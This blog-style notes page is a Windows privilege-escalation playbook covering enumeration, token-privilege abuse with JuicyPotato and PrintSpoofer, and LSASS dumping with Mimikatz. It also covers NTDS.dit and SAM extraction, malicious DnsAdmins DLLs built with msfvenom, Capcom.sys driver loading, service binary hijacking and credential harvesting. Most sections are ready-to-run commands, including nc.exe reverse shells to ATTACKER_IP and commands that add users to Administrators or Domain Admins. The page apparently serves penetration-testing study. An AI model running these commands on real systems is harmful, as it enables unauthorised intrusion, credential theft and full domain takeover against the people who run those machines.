Notes | Windows Privilege Escalation

Windows Privilege Escalation

As with the Linux operating system, a misconfigured Windows machine can allow an attacker to gain Administrator or NT AUTHORITY\SYSTEM rights. While the Administrator is a user on any Windows machine, NT AUTHORITY\SYSTEM, often called SYSTEM, is an account that has the most rights but to which you cannot log in with credentials.

For reading purpose, I won’t tell if we are using a CMD console when running a command but will display a command that uses Powershell like PS> COMMAND.

Network Information Gathering

IPconfig

As for a Linux machine, we may want to check for the network of the machine. We can print information about its internet network with the command ipconfig :

ipconfig /all

This will allow us to know if there is more than one network interface which can be leveraged to access a computer on a sub-network.

ARP

We can use the arp command to check for other computers on the network like this :

arp -a

Routing Table

The routing table can show us what routes can packages take on the network :

route print

Netstat

The netstat command can show us if there is any service running on the machine that may be leveraged :

netstat -ano

Windows Defender & AppLocker Rules

To display information about Windows Defender or the AppLocker rules we can run the followinf commands :

PS > Get-MpComputerStatus

PS > Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

---

Basic Enumeration

It’s important to have information about the computer we are attacking. Like on Linux, we can, for example, list the running processes with the tasklist command :

tasklist /svc

System information

We can list environment variables with the set command. With the systeminfo we can get a lot of information about the computer we are in like the host name, the OS Version, the type of processor used…

To see if a machine is up to date, we can look to its hotfixes with the following command and by checking the Microsoft website:

wmic qfe

or

PS > Get-HotFix | ft -AutoSize

You can search for a specific hotfix here

We can look at the path variables like this :

PS > cmd /c echo %PATH%

Program installed

We can check for non-standard applications that may have been installed by a user or an administrator :

wmic product get name

or

PS > Get-WmiObject -Class Win32_Product |  select Name, Version

RPC

A user can connect to a machine with the RPC protocol. We can look if another user is connected on our machine with the query user command. If you want to know how to impersonate this user check this part of my blog.

Current User Privileges

When we arrive on a machine we may want to know which user we are or what are our rights. To check our user we can use the whoami or the echo %USERNAME% command. To see which rights our user has we can run the command whoami /priv and if we are a classic user we may get this output.

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

As you can see, we have some privileges that are disabled. You can enable them all using this script or this one. First enable the script Import-Module .\EnableAllTokenPrivs.ps1 and then run it .\EnableAllTokenPrivs.ps1.

We may want to check which group we are in because we can inherit privileges from certain.

whoami /groups

We may also want to look for other users with the net user command or the list of all groups with this net localgroup command. To get information about a certain group you can use net localgroup GROUP_TO_CHECK.

---

Exploit User Rights

SeImpersonate & SeAssignPrimaryToken

Every process in Windows has a token that contains details about the account that is operating it. Since these tokens are merely memory addresses that can be brute-forced by users who are unable to access memory, they are not thought of as secure resources. The SeImpersonate privilege is required to use the token. Only administrator accounts are granted access to it, and in most circumstances, it can be taken away during system hardening.

We are going to use JuicyPotato that can be used to exploit the SeImpersonate or SeAssignPrimaryToken privileges via DCOM/NTLM reflection abuse. Start a netcat listener on your attacker machine and then launch this command :

c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe ATTACKER_IP ATTACKER_PORT -e cmd" -t *

You may get issues if you don’t put the full path of a file.

Note that we are using a cmd reverse shell but we can of course use powershell instead.

If you are not running the exploit from a running process like an SQL server. You may need to add the -c flag. Then add a value, depending on the machine you are on, from here. If the first value doesn’t work try the second, then the third… until it works.

Where JuicyPotato doesn’t work Windows Server 2019 and Windows 10 build 1809 onwards, RoguePotato and PrintSpoofer do work.

c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe  ATTACKER_IP ATTACKER_PORT -e cmd"

or

c:\tools\RoguePotato.exe -r ATTACKER_IP -e "c:\tools\nc.exe  ATTACKER_IP ATTACKER_PORT -e cmd" -l LISTENING_PORT

Note that we are using a cmd reverse shell but we can of course use powershell instead.

SeDebugPrivilege

Instead of adding the account to the administrators group, a user may be given the SeDebugPrivilege to run a specific program or service or help with troubleshooting. To leverage this privilege we can dump process memory. The Local Security Authority Subsystem Service (LSASS) process is a good target. We can do it with the GUI or with the command line. With the GUI, you will need to launch the Task Manager, go to the Details section and find the lsass.exe process. When found, you can right click on it and select Create dump file. The command for the command line is :

procdump.exe -accepteula -ma lsass.exe lsass.dmp

procdump.exe may not be installed by default but you can install it from the Windows website

Now that we have the lsass dump (lsass.dmp), we can run Mimikatz (you can also use the github repo).

mimikatz.exe

When on Mimikatz, we will try to dump password hashes :

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonpasswords
<SNIP>
Authentication Id : 0 ; 23026942 (00000000:015f5cfe)
Session           : RemoteInteractive from 2
User Name         : bob
Domain            : WIN-TEST
Logon Server      : WIN-TEST
Logon Time        : 9/2/2022 2:59:52 PM
SID               : S-1-5-21-3769161915-3336846931-3985975925-1000
        msv :
         [00000003] Primary
         * Username : bob
         * Domain   : WIN-TEST
         * NTLM     : cf3a5525ee9414229e66279623ed5c58
         * SHA1     : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
<SNIP>

SeTakeOwnershipPrivilege

The SeTakeOwnershipPrivilege policy setting determines which users can take ownership of any securable object in the device, including Active Directory objects, NTFS files and folders, printers, registry keys, services, processes, and threads.

First we can check who has the ownership of the file we are targeting :

PS > Get-ChildItem -Path 'C:\Users\bob\Desktop\Secret_Data.txt' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

If there is no name on the Owner section, you can look a the owner of the directory where the file is located with the dir /q command. Now we can take the ownership :

PS > takeown /f 'C:\Department Shares\Private\IT\cred.txt'

If we still can’t read the file, we can use the icacls command to change its Access Control Lists (ACL) :

icacls 'C:\Users\bob\Desktop\Secret_Data.txt' /grant OUR_USER:F

This command will grant us full access (F) to the file.

---

Exploit Groups Permissions

Just like the user privileges, groups allow you to do things that a normal user may not be able to do. To see in which group we are in you can use the command whoami /groups.

Backup Operators

When member of this group, we are granted the SeBackup and SeRestore rights. SeBackupPrivilege allows file content retrieval, even if the security descriptor on the file might not grant such access. A caller with SeBackupPrivilege enabled obviates the need for any ACL-based security check.

Because we can’t use the standard copy command, we can use a program to copy files or just use the following PoC. As the Github states, we need to import the two dll in Powershell :

PS > Import-Module .\SeBackupPrivilegeUtils.dll
PS > Import-Module .\SeBackupPrivilegeCmdLets.dll

To check if the SeBackupPrivilege is enabled, we can use either the whoami /priv or the PS > Get-SeBackupPrivilege command. If the privilege isn’t enabled, we can use the following command to enable it :

PS > Set-SeBackupPrivilege

Imagine that we can’t read the content of the Secret_Data.txt on the bob desktop. We can use this command to copy it to a location where we have read rights.

PS > Copy-FileSeBackupPrivilege 'C:\Users\bob\Desktop\Secret_Data.txt' .\Secret_Data.txt

Attacking Domain Controler (NTDS.dit)

This group also permits local domain controller logins. Given that it stores the NTLM hashes for all user and computer objects in the domain, the active directory database NTDS.dit makes for an extremely appealing target. However, unprivileged users cannot access this file since it is locked.

The diskshadow command allows us to create a shadow copy of the C: drive.

PS > diskshadow.exe
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

Now if you try to list the directories of the E: drive, you will see the same tree structure as in the C: drive. The Copy-FileSeBackupPrivilege cmdlet allows us to bypass ACL and copy the NTDS.dit wherever we want :

PS > Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Users\Public\Downloads\ntds.dit

You also use tools to extract the ntds.dit file like robocopy : robocopy /B E:\Windows\NTDS .\ntds ntds.dit

We can now export SAM and SYSTEM registery hives and try to crack local user passwords. First we need to export these hives :

reg save HKLM\SYSTEM SYSTEM.SAV

reg save HKLM\SAM SAM.SAV

Now that we have the SAM and SYSTEM registery hives, we can extract all AD account credentials using tools such as secretsdump.py or the PowerShell DSInternals :

1. DSInternals

PS > Import-Module .\DSInternals.psd1
PS > $key = Get-BootKey -SystemHivePath .\SYSTEM
PS > Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
<CREDS>

1. Secretsdump

secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0xc0a9116f907bd37afaaa845cb87d0550
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 85541c20c346e3198a3ae2c09df7f330
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
Bob:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>

secretsdump.py is part of the Impaket collection. If you already have Impaketinstalled on your computer you already have the secretsdump.py too. You can use locate secretsdump.py` to locate it.

You can use this output for a pass the hash attack or try to crack it with Hashcat.

Event Log Readers

Members of this group can read event logs from local computers. The group is created when the server is promoted to a domain controller. You can try finding commands ran with credentials using either the CMD or Powershell :

wevtutil qe Security /rd:true /f:text | findstr "/user"

PS > wevtutil qe Security /rd:true /f:text | Select-String "/user"

or

PS > Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}

DnsAdmins

Members of DnsAdmins group have access to network DNS information. The default permissions are as follows: Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions. This group exists only if the DNS server role is or was once installed on a domain controller in the domain. Membership in this group may be used to increase privileges on a Domain Controller or in cases where a different server is serving as the domain’s DNS server because the DNS service is run as NT AUTHORITY\SYSTEM.

Leveraging DnsAdmins Access

First we will create a malicious dll file to add your user to the domain admins or to create a reverse shell on our attacker Linux machine :

msfvenom -p windows/x64/exec cmd='net group "domain admins" USER /add /domain' -f dll -o adduser.dll

or

msfvenom -p windows/shell/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f dll -o shell-cmd.dll

Now that our .dll malicious file is created you can upload it to the Windows machines using the method of your choice (HTTP, SMB, FTP server…). If you start a HTTP server you can download the file on windows using the following command :

wget "http://IP:PORT/YOUR_MALICIOUS_FILE.dll" -outfile "YOUR_MALICIOUS_FILE.dll"

If you are not a member of the DnsAdmins group you may get an error when trying to execute your malicious dll.

dnscmd.exe /config /serverlevelplugindll C:\Users\Public\Downloads\YOUR_MALICIOUS_FILE.dll

You can check if you are a member of the DnsAdmins group with the command : Get-ADGroupMember -Identity DnsAdmins.

We must specify the full path to our malicious DLL or the attack will not work properly.

To receive our reverse shell or to add our user to a certain group we need to stop the DNS service and start it back :

sc stop dns

sc start dns

You can also use the mimilib.dll (by the creator of Mimikatz) explained in this blog to abuse the dns admin group privileges.

Creating a WPAD Record

Clients can utilize the Web Proxy Auto-Discovery (WPAD) Protocol to find the URL of a configuration file using DHCP and/or DNS discovery techniques. The configuration file can be invoked to find the proxy for a given URL after detection and download are finished.

For this attack to work, we first need to disable the Global Query Block List :

PS > Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.DOMAIN_NAME.local

We can now add our attacker machine to the WPAD Records :

PS > Add-DnsServerResourceRecordA -Name wpad -ZoneName DOMAIN.local -ComputerName dc01.DOMAIN.local -IPv4Address OUR_ATTACKER_IP

Print Operators

Members of this group can manage, create, share, and delete printers that are connected to domain controllers in the domain. They can also manage Active Directory printer objects in the domain. Members of this group can locally sign in to and shut down domain controllers in the domain. This grant their user the SeLoadDriverPrivilege privilege.

First we can use the EnableSeLoadDriverPrivilege tool to enable the privilege and load the driver. You can add the following includes at the begining of the file :

#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"

You can compile the .cpp file in Visual Studio using the following command : cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp. Now you have to upload this Capcom.sys file and add a reference to this driver under our HKEY_CURRENT_USER tree :

reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Users\Public\Downloads\Capcom.sys"

reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

We can use the DriverView.exe tool to see if the Capcom.sys driver is loaded or not.

PS > .\DriverView.exe /stext drivers.txt

PS > cat drivers.txt | Select-String -pattern Capcom

If the second command doesn’t give you any output, it means that the driver is not loaded. You can run the program that you have compiled earlier :

EnableSeLoadDriverPrivilege.exe

If you run the previous commands, you will now see that the Capcom.sys driver is now loaded. You can now use this PoC to exploit the Capcom.sys.

If you don’t have a GUI connection to the windows machine, you may not be able to execute the previous exploit. You can modify it by replacing the call of the cmd.exe in the LaunchShell by a call to a reverse shell executable that you created before compiling ExploitCapcom.cpp. The line should look like TCHAR CommandLine[] = TEXT("C:\\ProgramData\\MyReverseShell.exe");.

You can automate all this process with this exploit and then run the ExploitCapcom.exe to pop us a SYSTEM shell :

EoPLoadDriver.exe System\CurrentControlSet\Capcom C:\Users\Public\Downloads\Capcom.sys

Server Operators

Members in the Server Operators group can administer domain controllers. This group exists only on domain controllers. By default, the group has no members. Members of the Server Operators group can perform the following: sign in to a server interactively, create and delete network shared resources, start and stop services, back up and restore files, format the hard disk drive of the computer, and shut down the computer. This group cannot be renamed, deleted, or moved. Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.

We need to find a service that start as SYSTEM. We can do it by using the sc qc SERVICE_NAME command or the PsService as follows :

PsService.exe security SERVICE_NAME

If the Server Operators group has privileges over this service we should see something like :

[ALLOW] BUILTIN\Server Operators
                All

Now that we know which service to exploit, we can change its binary path to execute a command like a reverse shell or adding our user to a certain group :

sc config SERVICE_NAME binPath= "cmd /c net localgroup Administrators OUR_USER /add"

We will get an error when starting the service because of the previous command. But when the error is prompted check your listener or in which group you are in. You should see that the previous command worked :

sc start SERVICE_NAME

If the service is already running, you can stop it with the sc stop SERVICE_NAME command.

Now that we have complete access to the domain controller, we can use crackmapexec to dump admin credentials, for example.

---

OS Attacks

Checking Weak ACL

We can check if there are binaries with weak ACL permission with the SharpUp executable :

PS > .\SharpUp.exe audit

With the result gathered with the SharpUp command, we can sharpen our results with the icalcs command :

PS > icacls "C:\PATH\TO\THE\FILE.exe"

When you find a vulnerable service you can replace the executable by your own (shell, reverse shell, add your user to admin group…) and then launch the service :

sc start SERVICE_NAME

Don’t forget to make a copy of the executable you are replacing not to break the environment and get back to the initial state after your assessment.

You can also use the Accesschk command to check for file permissions of the service :

accesschk.exe /accepteula SERVICE_NAME

If you have enough rights, you can change the path of the binary as in the Server Operators section.

Unquoted Service Path

The registry configuration establishes a path to the binary that must be run when a service is started after it is installed. Windows will make an attempt to locate this binary in several locations if it is not enclosed in quotes.

You can search for unquote service path manualy withe the sc qc SERVICE_NAME or automatically with the command :

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

If we find a service which has the path C:\Program Files (x86)\My Service\MyService.exe, then, Windows will try to locate C:\Program.exe or C:\Program Files (x86)\My.exe because the path isn’t between quotes. So if we have enough rights to put a malicious executable in those places, we could hijack the service.

Kernel Exploit

Most of the Windows kernel exploit have their own CVE and PoC so I’m not going to go in depth with them but here is a list of some of them :

• MS16-032
• MS16-135
• MS17-010
• CVE-2017-0213
• Hot Potato
• SmashedPotato

---

Credential Theft

Once we arrive on a machine, we may want to look for credentials. Either they are still in some history or in some files. Some people put their password in some file in clear-text and we can find those by searching the keyword password :

PS > findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml

The /M option in /SIM can be removed to print the content of the file. The above command will only display file names.

The /i or /p flags can be added to respectively ignores the case of the characters when searching for the string and skip files with non-printable characters. For more information about findstr flags, you can check its manual

File Extensions

You can look for interesting file based on their name and/or their extension. Here are some example on how to do so :

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*

where /R C:\ *.config

PS > Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Sticky Notes Passwords

Sticky Notes is a basic Windows app that allows you to take notes and save them on your computer. Those notes are saved as information in a database and are located in :

C:\Users\USERNAME\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

We can copy all plum.sqlite* files down to our system and open them with a tool such as DB Browser for SQLite and view the Text column in the Note table with the query :

SELECT Text FROM Note;

This can also be done with PowerShell using the PSSQLite module :

PS > Set-ExecutionPolicy Bypass -Scope Process
<SNIP>
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): A

PS > cd .\PSSQLite\
PS > Import-Module .\PSSQLite.psd1
PS > $db = 'C:\Users\Bob\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
PS > Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap

Chrome Dictionary Files

We also can find clear-text passwords in Google dictionary files. Sensitive information, such as passwords, may be submitted via a browser-based application or email client, which highlights any terms it doesn’t understand. In order to eliminate the annoying red underlining, the user may add these words to their dictionary.

PS > gc 'C:\Users\Bob\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password

Unattended Installation Files

Auto-logon settings or additional accounts that will be established as part of the installation may be defined via unattended installation files. The unattend.xml file stores passwords either in plaintext or base64-encoded form.

PowerShell History File

In Powershell 5.0 and higer, its history is stored in this file :

C:\Users\USERNAME\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

We can confirm that this is the real path using Powershell :

PS > (Get-PSReadLineOption).HistorySavePath

To read the content of this history file, we can use type FILE_TO_READ or the gc command :

PS > gc (Get-PSReadLineOption).HistorySavePath

To list history of all users that we have access as our current one, we can use this one-liner :

PS > foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Saved Credentilas

We can list users that have saved their credentials using the command cmdkey /list. Now that we know which user have saved their credentials, we can run command as them :

PS > runas /savecred /user:DOMAIN\USER "COMMAND HERE"

Browser Credentials

To retreive browser saved credentials, we can use tools such as SharpChrome :

PS > .\SharpChrome.exe logins /unprotect

Automated Tools

LaZagne

The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.

PS > .\lazagne.exe all

Email

Using the program MailSniper, if we are able to log into a domain-joined system as a domain user with a Microsoft Exchange mailbox, we can try to search the user’s email for words like “pass,” “creds,” “credentials,” etc.

SessionGopher

To extract saved WinSCP, FileZilla, SuperPuTTY, PuTTY, and RDP credentials, we can use SessionGopher. The PowerShell-written utility looks for and decrypts remote access tool saved login credentials. It can be executed remotely or locally. It looks up and decrypts any session data it can find by searching the HKEY USERS hive for all users who have logged into a domain-joined (or standalone) host. Additionally, it may be used to search disks for RSA (.sdtid), Remote Desktop (.rdp), and PuTTY private key files (.ppk).

PS > .\SessionGopher.ps1
 
PS > Invoke-SessionGopher -Target MACHINE_NAME
 
          o_
         /  ".   SessionGopher
       ,"  _-"
     ,"   m m
  ..+     )      Brandon Arvanaghi
     `m..m       Twitter: @arvanaghi | arvanaghi.com
 
[+] Digging on MACHINE_NAME...
<SNIP>

Wifi Passwords

We can use the netsh command to show us password of Wifi networks we already connected to. We can first list recent Wi-Fi connections :

netsh wlan show profile

And then, we can list the password for a specific Wi-Fi :

netsh wlan show profile WIFI_NAME key=clear

---

Mount VHDX/VMDK

Tools such as Snaffler can show us some interesting files such as .vhd, .vhdx, and .vmdk files. These are Virtual Hard Disk, Virtual Hard Disk v2 (both used by Hyper-V), and Virtual Machine Disk (used by VMware). These three files can be mounted on either our local Linux attack machine or Windows attack machine if we come across any of them. The next commands allow us to mount a share from our Linux attack box or copy across one of these files, allowing us to browse the various operating system files and folders as if we were logged in.

guestmount -a FILE_NAME.vmdk -i --ro /mnt/vmdk

or

guestmount --add  FILE_NAME.vhdx  --ro /mnt/vhdx/ -m /dev/sda1

On our Windows machine we can simply right-click on the file we want to mount and click on the Mount option.